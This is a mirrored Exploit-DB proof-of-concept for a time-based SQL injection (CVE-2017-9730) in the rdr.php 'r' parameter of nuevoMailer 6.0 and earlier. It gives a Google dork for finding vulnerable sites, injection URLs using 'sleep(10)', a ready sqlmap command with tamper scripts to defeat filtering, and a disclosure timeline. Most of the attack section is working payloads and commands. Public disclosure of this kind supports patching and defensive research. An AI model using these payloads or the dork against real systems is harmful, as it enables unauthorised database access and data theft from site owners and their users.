bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/42193.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

27 lines
No EOL
1.1 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and earlier
# Tested on: Linux
# CVE: CVE-2017-9730
Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier
allows remote attackers to execute arbitrary SQL commands via the "r" parameter.
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between  --hostname --technique=T -v 3 --random-agent --time-sec=4
NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
Disclosure Timeline:
2017-06-09: Vendor has been notified
2017-06-09: Vendor responded with intention to fix the vulnerability
2017-06-16: CVE number acquired
2017-06-16: Public disclosure
Reference in a new issue View git blame Copy permalink